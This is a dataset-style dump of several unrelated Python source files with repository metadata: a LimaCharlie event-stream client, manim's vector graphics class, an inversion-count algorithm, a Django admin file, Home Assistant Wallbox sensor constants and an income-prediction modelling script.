self._finalSpoutUrl = self._hConn.history[ 0 ].headers[ 'Location' ]
self._threads.add( gevent.spawn( self._handleConnection ) )
self._futureCleanupInterval = 30
self._threads.add( gevent.spawn_later( self._futureCleanupInterval, self._cleanupFutures ) )
def _cleanupFutures( self ):
now = time.time()
for trackingId, futureInfo in self._futures.items():
ttl = futureInfo[ 1 ]
if ttl < now:
self._futures.pop( trackingId, None )
self._threads.add( gevent.spawn_later( self._futureCleanupInterval, self._cleanupFutures ) )
def shutdown( self ):
'''Stop receiving data.'''
self._isStop = True
if self._hConn is not None:
self._hConn.close()
self._threads.join( timeout = 2 )
def getDropped( self ):
'''Get the number of messages dropped because queue was full.'''
return self._dropped
def resetDroppedCounter( self ):
'''Reset the counter of dropped messages.'''
self._dropped = 0
def registerFutureResults( self, tracking_id, future, ttl = ( 60 * 60 * 1 ) ):
'''Register a FutureResults to receive events coming with a specific tracking ID and investigation ID.
Args:
tracking_id (str): the full value of the investigation_id field to match on, including the custom tracking after the "/".
future (limacharlie.FutureResults): future to receive the events.
ttl (int): number of seconds this future should be tracked.
'''
self._futures[ tracking_id ] = ( future, time.time() + ttl )
def _handleConnection( self ):
while not self._isStop:
self._man._printDebug( "Stream started." )
try:
for line in self._hConn.iter_lines( chunk_size = 1024 * 1024 * 10 ):
try:
if self._is_parse:
line = json.loads( line )
# The output.limacharlie.io service also injects a
# few trace messages like keepalives and number of
# events dropped (if any) from the server (indicating
# we are too slow). We filter those out here.
if '__trace' in line:
if 'dropped' == line[ '__trace' ]:
self._dropped += int( line[ 'n' ] )
else:
future = self._futures.get( line.get( 'routing', {} ).get( 'investigation_id', None ), None )
if future is not None:
future[ 0 ]._addNewResult( line )
else:
self.queue.put_nowait( line )
else:
self.queue.put_nowait( line )
except:
self._dropped += 1
except Exception as e:
if not self._isStop:
self._man._printDebug( "Stream closed: %s" % str( e ) )
else:
self._man._printDebug( "Stream closed." )
finally:
self._man._printDebug( "Stream closed." )
if not self._isStop:
self._hConn = requests.get( self._finalSpoutUrl,
stream = True,
allow_redirects = False,
timeout = _TIMEOUT_SEC )
def _signal_handler():
global sp
_printToStderr( 'You pressed Ctrl+C!' )
if sp is not None:
sp.shutdown()
sys.exit( 0 )
def _printToStderr( msg ):
sys.stderr.write( str( msg ) + '\n' )
if __name__ == "__main__":
import argparse
import getpass
import uuid
import gevent
import signal
import limacharlie
sp = None
gevent.signal( signal.SIGINT, _signal_handler )
parser = argparse.ArgumentParser( prog = 'limacharlie.io spout' )
parser.add_argument( 'data_type',
type = str,
help = 'the type of data to receive in spout, one of "event", "detect" or "audit".' )
parser.add_argument( '-o', '--oid',
type = lambda x: str( uuid.UUID( x ) ),
required = False,
dest = 'oid',
help = 'the OID to authenticate as, if not specified global creds are used.' )
parser.add_argument( '-i', '--investigation-id',
type = str,
dest = 'inv_id',
default = None,
help = 'spout should only receive events marked with this investigation id.' )
parser.add_argument( '-t', '--tag',
type = str,
dest = 'tag',
default = None,
help = 'spout should only receive events from sensors tagged with this tag.' )
parser.add_argument( '-c', '--category',
type = str,
dest = 'cat',
default = None,
help = 'spout should only receive detections from this category.' )
parser.add_argument( '-s', '--sid',
type = lambda x: str( uuid.UUID( x ) ),
dest = 'sid',
default = None,
help = 'spout should only receive detections or events from this sensor.' )
args = parser.parse_args()
secretApiKey = getpass.getpass( prompt = 'Enter secret API key: ' )
_printToStderr( "Registering..." )
man = limacharlie.Manager( oid = args.oid, secret_api_key = secretApiKey )
sp = limacharlie.Spout( man,
args.data_type,
inv_id = args.inv_id,
tag = args.tag,
cat = args.cat,
sid = args.sid )
_printToStderr( "Starting to listen..." )
while True:
data = sp.queue.get()
print( json.dumps( data, indent = 2 ) )
_printToStderr( "Exiting." ) | [
"maxime@refractionpoint.com"
] | maxime@refractionpoint.com |
06b102050b963026c4e5184c89d73ea7e22da896 | 4cc16cdcee820f258fcdb7550b853949fc59de46 | /mobject/vectorized_mobject.py | 615e24502c0de9496acb4dcc415c9e2f3a81e407 | [] | no_license | eitanas/manim | c710802ef301b11d0ac6549bb58e04fcc59cc16d | 825ff127a517f35041b2def6efe29a8d6358cd4c | refs/heads/master | 2021-01-22T16:26:09.805304 | 2016-08-15T22:07:28 | 2016-08-15T22:07:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,000 | py | import re
from .mobject import Mobject
from helpers import *
class VMobject(Mobject):
CONFIG = {
"fill_color" : None,
"fill_opacity" : 0.0,
"stroke_color" : None,
#Indicates that it will not be displayed, but
#that it should count in parent mobject's path
"is_subpath" : False,
"close_new_points" : False,
"mark_paths_closed" : False,
"considered_smooth" : True,
"propogate_style_to_family" : False,
}
def __init__(self, *args, **kwargs):
Mobject.__init__(self, *args, **kwargs)
VMobject.init_colors(self)
## Colors
def init_colors(self):
self.set_style_data(
stroke_color = self.stroke_color or self.color,
stroke_width = self.stroke_width,
fill_color = self.fill_color or self.color,
fill_opacity = self.fill_opacity,
family = self.propogate_style_to_family
)
return self
def set_family_attr(self, attr, value):
for mob in self.submobject_family():
setattr(mob, attr, value)
def set_style_data(self,
stroke_color = None,
stroke_width = None,
fill_color = None,
fill_opacity = None,
family = True):
if stroke_color is not None:
self.stroke_rgb = color_to_rgb(stroke_color)
if fill_color is not None:
self.fill_rgb = color_to_rgb(fill_color)
if stroke_width is not None:
self.stroke_width = stroke_width
if fill_opacity is not None:
self.fill_opacity = fill_opacity
if family:
kwargs = locals()
kwargs.pop("self")
for mob in self.submobjects:
mob.set_style_data(**kwargs)
return self
def set_fill(self, color = None, opacity = None, family = True):
probably_meant_to_change_opacity = reduce(op.and_, [
color is not None,
opacity is None,
self.fill_opacity == 0
])
if probably_meant_to_change_opacity:
opacity = 1
return self.set_style_data(
fill_color = color,
fill_opacity = opacity,
family = family
)
def set_stroke(self, color = None, width = None, family = True):
return self.set_style_data(
stroke_color = color,
stroke_width = width,
family = family
)
def highlight(self, color, family = True):
self.set_style_data(
stroke_color = color,
fill_color = color,
family = family
)
return self
# def fade(self, darkness = 0.5):
# Mobject.fade(self, darkness)
# return self
def get_fill_color(self):
try:
self.fill_rgb = np.clip(self.fill_rgb, 0, 1)
return Color(rgb = self.fill_rgb)
except:
return Color(WHITE)
def get_fill_opacity(self):
return self.fill_opacity
def get_stroke_color(self):
try:
self.stroke_rgb = np.clip(self.stroke_rgb, 0, 1)
return Color(rgb = self.stroke_rgb)
except:
return Color(WHITE)
def get_color(self):
if self.fill_opacity == 0:
return self.get_stroke_color()
return self.get_fill_color()
## Drawing
def start_at(self, point):
if len(self.points) == 0:
self.points = np.zeros((1, 3))
self.points[0] = point
return self
def add_control_points(self, control_points):
assert(len(control_points) % 3 == 0)
self.points = np.append(
self.points,
control_points,
axis = 0
)
return self
def is_closed(self):
return is_closed(self.points)
def set_anchors_and_handles(self, anchors, handles1, handles2):
assert(len(anchors) == len(handles1)+1)
assert(len(anchors) == len(handles2)+1)
total_len = 3*(len(anchors)-1) + 1
self.points = np.zeros((total_len, self.dim))
self.points[0] = anchors[0]
arrays = [handles1, handles2, anchors[1:]]
for index, array in enumerate(arrays):
self.points[index+1::3] = array
return self.points
def set_points_as_corners(self, points):
if len(points) <= 1:
return self
points = np.array(points)
self.set_anchors_and_handles(points, *[
interpolate(points[:-1], points[1:], alpha)
for alpha in 1./3, 2./3
])
return self
def set_points_smoothly(self, points):
if len(points) <= 1:
return self
h1, h2 = get_smooth_handle_points(points)
self.set_anchors_and_handles(points, h1, h2)
return self
def set_points(self, points):
self.points = np.array(points)
return self
def set_anchor_points(self, points, mode = "smooth"):
if not isinstance(points, np.ndarray):
points = np.array(points)
if self.close_new_points and not is_closed(points):
points = np.append(points, [points[0]], axis = 0)
if mode == "smooth":
self.set_points_smoothly(points)
elif mode == "corners":
self.set_points_as_corners(points)
else:
raise Exception("Unknown mode")
return self
def change_anchor_mode(self, mode):
anchors, h1, h2 = self.get_anchors_and_handles()
self.set_anchor_points(anchors, mode = mode)
return self
def make_smooth(self):
self.considered_smooth = True
return self.change_anchor_mode("smooth")
def make_jagged(self):
return self.change_anchor_mode("corners")
def add_subpath(self, points):
"""
A VMobject is meant to represnt
a single "path", in the svg sense of the word.
However, one such path may really consit of separate
continuous components if there is a move_to command.
These other portions of the path will be treated as submobjects,
but will be tracked in a separate special list for when
it comes time to display.
"""
subpath_mobject = self.copy()#TODO, better way?
subpath_mobject.is_subpath = True
subpath_mobject.set_points(points)
self.add(subpath_mobject)
return subpath_mobject
def get_subpath_mobjects(self):
return filter(
lambda m : m.is_subpath,
self.submobjects
)
def apply_function(self, function, maintain_smoothness = True):
Mobject.apply_function(self, function)
if maintain_smoothness and self.considered_smooth:
self.make_smooth()
return self
## Information about line
def component_curves(self):
for n in range(self.get_num_anchor_points()-1):
yield self.get_nth_curve(n)
def get_nth_curve(self, n):
return bezier(self.points[3*n:3*n+4])
def get_num_anchor_points(self):
return (len(self.points) - 1)/3 + 1
def point_from_proportion(self, alpha):
num_cubics = self.get_num_anchor_points()-1
interpoint_alpha = num_cubics*(alpha % (1./num_cubics))
index = 3*int(alpha*num_cubics)
cubic = bezier(self.points[index:index+4])
return cubic(interpoint_alpha)
def get_anchors_and_handles(self):
return [
self.points[i::3]
for i in range(3)
]
## Alignment
def align_points(self, mobject):
Mobject.align_points(self, mobject)
is_subpath = self.is_subpath or mobject.is_subpath
self.is_subpath = mobject.is_subpath = is_subpath
mark_closed = self.mark_paths_closed and mobject.mark_paths_closed
self.mark_paths_closed = mobject.mark_paths_closed = mark_closed
return self
def align_points_with_larger(self, larger_mobject):
assert(isinstance(larger_mobject, VMobject))
self.insert_n_anchor_points(
larger_mobject.get_num_anchor_points()-\
self.get_num_anchor_points()
)
return self
def insert_n_anchor_points(self, n):
curr = self.get_num_anchor_points()
if curr == 0:
self.points = np.zeros((1, 3))
n = n-1
if curr == 1:
self.points = np.repeat(self.points, 3*n+1, axis = 0)
return self
points = np.array([self.points[0]])
num_curves = curr-1
#Curves in self are buckets, and we need to know
#how many new anchor points to put into each one.
#Each element of index_allocation is like a bucket,
#and its value tells you the appropriate index of
#the smaller curve.
index_allocation = (np.arange(curr+n-1) * num_curves)/(curr+n-1)
for index in range(num_curves):
curr_bezier_points = self.points[3*index:3*index+4]
num_inter_curves = sum(index_allocation == index)
alphas = np.arange(0, num_inter_curves+1)/float(num_inter_curves)
for a, b in zip(alphas, alphas[1:]):
new_points = partial_bezier_points(
curr_bezier_points, a, b
)
points = np.append(
points, new_points[1:], axis = 0
)
self.set_points(points)
return self
def get_point_mobject(self, center = None):
if center is None:
center = self.get_center()
return VectorizedPoint(center)
def repeat_submobject(self, submobject):
if submobject.is_subpath:
return VectorizedPoint(submobject.points[0])
return submobject.copy()
def interpolate_color(self, mobject1, mobject2, alpha):
attrs = [
"stroke_rgb",
"stroke_width",
"fill_rgb",
"fill_opacity",
]
for attr in attrs:
setattr(self, attr, interpolate(
getattr(mobject1, attr),
getattr(mobject2, attr),
alpha
))
if alpha == 1.0:
# print getattr(mobject2, attr)
setattr(self, attr, getattr(mobject2, attr))
def pointwise_become_partial(self, mobject, a, b):
assert(isinstance(mobject, VMobject))
#Partial curve includes three portions:
#-A middle section, which matches the curve exactly
#-A start, which is some ending portion of an inner cubic
#-An end, which is the starting portion of a later inner cubic
if a <= 0 and b >= 1:
self.set_points(mobject.points)
self.mark_paths_closed = mobject.mark_paths_closed
return self
self.mark_paths_closed = False
num_cubics = mobject.get_num_anchor_points()-1
lower_index = int(a*num_cubics)
upper_index = int(b*num_cubics)
points = np.array(
mobject.points[3*lower_index:3*upper_index+4]
)
if len(points) > 1:
a_residue = (num_cubics*a)%1
b_residue = (num_cubics*b)%1
points[:4] = partial_bezier_points(
points[:4], a_residue, 1
)
points[-4:] = partial_bezier_points(
points[-4:], 0, b_residue
)
self.set_points(points)
return self
class VectorizedPoint(VMobject):
CONFIG = {
"color" : BLACK,
"artificial_width" : 0.01,
"artificial_height" : 0.01,
}
def __init__(self, location = ORIGIN, **kwargs):
VMobject.__init__(self, **kwargs)
self.set_points(np.array([location]))
def get_width(self):
return self.artificial_width
def get_height(self):
return self.artificial_height
| [
"grantsanderson7@gmail.com"
] | grantsanderson7@gmail.com |
6f37e652c5ee9b68c1579f12e147989fb8c2cbd4 | c8fab9ceda9a5882584d9944a91c84a1828e1d8b | /code/35.数组中的逆序对.py | 4396b2143041b5024aa2e6b5cae176862168b323 | [] | no_license | Confucius-hui/Sword-to-office | 7683bdb3037b711181e78aec5a16c9dbfa1c34d9 | 0a018c77e7faa89ad3f1daa87cee31d2b539e082 | refs/heads/master | 2020-04-08T07:58:10.713008 | 2019-06-20T08:38:03 | 2019-06-20T08:38:03 | 159,159,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,555 | py | '''
在数组中的两个数字,如果前面一个数字大于后面的数字,则这两个数字组成一个逆序对。
输入一个数组,求出这个数组中的逆序对的总数P。
并将P对1000000007取模的结果输出。 即输出P%1000000007
'''
# -*- coding:utf-8 -*-
class Solution:
def InversePairs1(self, data):
length = len(data)
count = 0
for i in range(length):
for j in range(i+1,length):
if data[i]>data[j]:
count+=1
return count #O(n**2)
def InversePairs(self,data):
data,count = self.merge_sort(data)
return count
def merge_sort(self,array):
if len(array) == 1:
return array,0
mid = len(array)//2
left,count1 = self.merge_sort(array[:mid])
right,count2 = self.merge_sort(array[mid:])
return self.merge(left,right,count1+count2)
def merge(self,left,right,count):
i,j = 0,0
result = []
while i<len(left) and j<len(right):
if left[i]<=right[j]:
result.append(left[i])
i+=1
else:
count+=(len(left)-i)
result.append(right[j])
j+=1
result.extend(left[i:])
result.extend(right[j:])
return result,count
def test_function():
solution = Solution()
data = [1,2,9,0]
result = solution.InversePairs1(data)
print(result)
print(solution.InversePairs(data))
if __name__ == '__main__':
test_function() | [
"1034243218@qq.com"
] | 1034243218@qq.com |
dbf025d7bcfc7df0a48718eccc0b0cb14810a02c | c2f35e5d3cfbbb73188a0cd6c43d161738e63bd1 | /12-Django框架学习/bj18/test2/booktest/admin.py | e10072641c8350576c99bd572fcb82581b21d2f6 | [] | no_license | yangh-zzf-itcast/Python_heima_Study | 2a7cd0d801d9d6f49548905d373bb409efc4b559 | 7d753c1cdd5c46a0e78032e12b1d2f5d9be0bf68 | refs/heads/master | 2020-04-30T06:59:04.000451 | 2019-04-19T12:15:30 | 2019-04-19T12:15:30 | 176,670,172 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 188 | py | from django.contrib import admin
from booktest.models import BookInfo, HeroInfo
# Register your models here.
# 注册模型类
admin.site.register(BookInfo)
admin.site.register(HeroInfo)
| [
"2459846416@qq.com"
] | 2459846416@qq.com |
c181290b15d6ff56e69337cc726815e6b271b393 | 2bcbf097c6f99a2ea30269bcab2420e9c7f08b67 | /homeassistant/components/wallbox/const.py | 62c9b2f6efdc0323ce964f2ff95c285d9867164d | [
"Apache-2.0"
] | permissive | yozik04/core | fe8fe96ac91ff18f2631ea40786e3b413dee839d | 3374005b336284730209c571240039683cf662bf | refs/heads/dev | 2023-03-06T02:28:28.520609 | 2021-10-30T17:18:39 | 2021-10-30T17:18:39 | 245,432,602 | 0 | 0 | Apache-2.0 | 2023-02-22T06:16:08 | 2020-03-06T13:54:31 | Python | UTF-8 | Python | false | false | 3,655 | py | """Constants for the Wallbox integration."""
from homeassistant.const import (
CONF_DEVICE_CLASS,
CONF_ICON,
CONF_NAME,
CONF_UNIT_OF_MEASUREMENT,
DEVICE_CLASS_BATTERY,
DEVICE_CLASS_CURRENT,
DEVICE_CLASS_ENERGY,
DEVICE_CLASS_POWER,
ELECTRIC_CURRENT_AMPERE,
ENERGY_KILO_WATT_HOUR,
LENGTH_KILOMETERS,
PERCENTAGE,
POWER_KILO_WATT,
)
DOMAIN = "wallbox"
CONF_STATION = "station"
CONF_ADDED_ENERGY_KEY = "added_energy"
CONF_ADDED_RANGE_KEY = "added_range"
CONF_CHARGING_POWER_KEY = "charging_power"
CONF_CHARGING_SPEED_KEY = "charging_speed"
CONF_CHARGING_TIME_KEY = "charging_time"
CONF_COST_KEY = "cost"
CONF_CURRENT_MODE_KEY = "current_mode"
CONF_DATA_KEY = "config_data"
CONF_DEPOT_PRICE_KEY = "depot_price"
CONF_MAX_AVAILABLE_POWER_KEY = "max_available_power"
CONF_MAX_CHARGING_CURRENT_KEY = "max_charging_current"
CONF_STATE_OF_CHARGE_KEY = "state_of_charge"
CONF_STATUS_DESCRIPTION_KEY = "status_description"
CONF_CONNECTIONS = "connections"
CONF_ROUND = "round"
CONF_SENSOR_TYPES = {
CONF_CHARGING_POWER_KEY: {
CONF_ICON: None,
CONF_NAME: "Charging Power",
CONF_ROUND: 2,
CONF_UNIT_OF_MEASUREMENT: POWER_KILO_WATT,
CONF_DEVICE_CLASS: DEVICE_CLASS_POWER,
},
CONF_MAX_AVAILABLE_POWER_KEY: {
CONF_ICON: None,
CONF_NAME: "Max Available Power",
CONF_ROUND: 0,
CONF_UNIT_OF_MEASUREMENT: ELECTRIC_CURRENT_AMPERE,
CONF_DEVICE_CLASS: DEVICE_CLASS_CURRENT,
},
CONF_CHARGING_SPEED_KEY: {
CONF_ICON: "mdi:speedometer",
CONF_NAME: "Charging Speed",
CONF_ROUND: 0,
CONF_UNIT_OF_MEASUREMENT: None,
CONF_DEVICE_CLASS: None,
},
CONF_ADDED_RANGE_KEY: {
CONF_ICON: "mdi:map-marker-distance",
CONF_NAME: "Added Range",
CONF_ROUND: 0,
CONF_UNIT_OF_MEASUREMENT: LENGTH_KILOMETERS,
CONF_DEVICE_CLASS: None,
},
CONF_ADDED_ENERGY_KEY: {
CONF_ICON: None,
CONF_NAME: "Added Energy",
CONF_ROUND: 2,
CONF_UNIT_OF_MEASUREMENT: ENERGY_KILO_WATT_HOUR,
CONF_DEVICE_CLASS: DEVICE_CLASS_ENERGY,
},
CONF_CHARGING_TIME_KEY: {
CONF_ICON: "mdi:timer",
CONF_NAME: "Charging Time",
CONF_ROUND: None,
CONF_UNIT_OF_MEASUREMENT: None,
CONF_DEVICE_CLASS: None,
},
CONF_COST_KEY: {
CONF_ICON: "mdi:ev-station",
CONF_NAME: "Cost",
CONF_ROUND: None,
CONF_UNIT_OF_MEASUREMENT: None,
CONF_DEVICE_CLASS: None,
},
CONF_STATE_OF_CHARGE_KEY: {
CONF_ICON: None,
CONF_NAME: "State of Charge",
CONF_ROUND: None,
CONF_UNIT_OF_MEASUREMENT: PERCENTAGE,
CONF_DEVICE_CLASS: DEVICE_CLASS_BATTERY,
},
CONF_CURRENT_MODE_KEY: {
CONF_ICON: "mdi:ev-station",
CONF_NAME: "Current Mode",
CONF_ROUND: None,
CONF_UNIT_OF_MEASUREMENT: None,
CONF_DEVICE_CLASS: None,
},
CONF_DEPOT_PRICE_KEY: {
CONF_ICON: "mdi:ev-station",
CONF_NAME: "Depot Price",
CONF_ROUND: 2,
CONF_UNIT_OF_MEASUREMENT: None,
CONF_DEVICE_CLASS: None,
},
CONF_STATUS_DESCRIPTION_KEY: {
CONF_ICON: "mdi:ev-station",
CONF_NAME: "Status Description",
CONF_ROUND: None,
CONF_UNIT_OF_MEASUREMENT: None,
CONF_DEVICE_CLASS: None,
},
CONF_MAX_CHARGING_CURRENT_KEY: {
CONF_ICON: None,
CONF_NAME: "Max. Charging Current",
CONF_ROUND: None,
CONF_UNIT_OF_MEASUREMENT: ELECTRIC_CURRENT_AMPERE,
CONF_DEVICE_CLASS: DEVICE_CLASS_CURRENT,
},
}
| [
"noreply@github.com"
] | noreply@github.com |
2390b2d58a1a06651ea1b46e681dc0a4a1d5453d | 1317129f0bc7d5c87aadba09b9ebe3e2c9613357 | /modelling.py | 679190f47d1c2b235df89a292fa6d22598f6a6b5 | [] | no_license | aaqib-ali/Income_prediction | 9dcecfcf73ff3b3a6c9608d573663ba7b8ff4f16 | f420ead78b7684e723f7801d6c7f47c1bae1aaa7 | refs/heads/main | 2023-04-09T20:27:12.999711 | 2021-04-16T09:02:28 | 2021-04-16T09:02:28 | 346,493,822 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,089 | py | import time
import os
import pandas as pd
from collections import Counter
import seaborn as sns
import utils.helper_exploration as exploration
from sklearn.preprocessing import OneHotEncoder, StandardScaler
from sklearn.compose import make_column_transformer, ColumnTransformer
from sklearn.pipeline import Pipeline
from sklearn.metrics import roc_auc_score
from sklearn.metrics import classification_report, confusion_matrix
# sklearn classifiers
from sklearn.ensemble import RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import LogisticRegression, SGDClassifier
from sklearn.feature_selection import SelectFromModel
from xgboost import XGBClassifier
# from this project
import utils.helper_models as helper_models
class Modelling:
def modelling(self, df_features_target):
print('Start Modelling:')
#model_name = 'LogisticRegression'
#model_name = 'SGDClassifier'
#model_name = 'RandomForest'
model_name = 'XgBoost'
# Checking missing values before model implementation
data_check = helper_models.missing_values_table(df_features_target)
print('Missing values in a column with the percentage', data_check)
# Split the data into train and Test
train_data_df, test_data_df = helper_models.split_dataset(df_features_target)
categorical_features, numeric_features, target_name = helper_models.read_features_name()
#train_data_df = helper_models.donwsample_trainset(train_data_df, target_name, 1234)
params = helper_models.read_parameters(model_name)
print(*params)
#classifier = LogisticRegression(**params)
#classifier = SGDClassifier(**params)
#classifier = RandomForestClassifier(**params)
classifier = XGBClassifier(**params)
print('XGBoost is Initialized')
#Build Model pipeline
categorical_pipe = Pipeline([
('onehot', OneHotEncoder(handle_unknown='ignore'))
])
numerical_pipe = Pipeline([
('Scaler', StandardScaler())
])
preprocessing = ColumnTransformer(
[('cat', categorical_pipe, categorical_features),
('num', numerical_pipe, numeric_features)])
model_pipeline = Pipeline([
('preprocess', preprocessing),
('classifier', classifier)])
print('Total Targets shape %s' % Counter(df_features_target[target_name]))
print('Train Targets shape %s' % Counter(train_data_df[target_name]))
print('Test Targets shape %s' % Counter(test_data_df[target_name]))
# fit the model
model_pipeline.fit(train_data_df.drop(columns=target_name), train_data_df[target_name])
helper_models.save_pipeline(model_pipeline)
#'''
prediction = model_pipeline.predict(test_data_df.drop(columns=target_name))
probability = model_pipeline.predict_proba(test_data_df.drop(columns=target_name))
print("Classification report", classification_report(test_data_df[target_name], prediction))
helper_models.fill_confusion_matrix_and_save(test_data_df[target_name],
prediction,f_name='Confusion matrix '+
str(model_name), out_dir='./results/Model_performance')
helper_models.plot_roc_curve_and_save(test_data_df[target_name],
probability, f_name='Roc Curve '+
str(model_name),out_dir='./results/Model_performance')
helper_models.plot_feature_importance_and_save(model_pipeline, categorical_features,
numeric_features, top_num=10,
f_name='Random Forest Classifier Feature Importance',
out_dir='./results/Model_performance')
#'''
| [
"aaqib_ali90@protonmail.com"
] | aaqib_ali90@protonmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.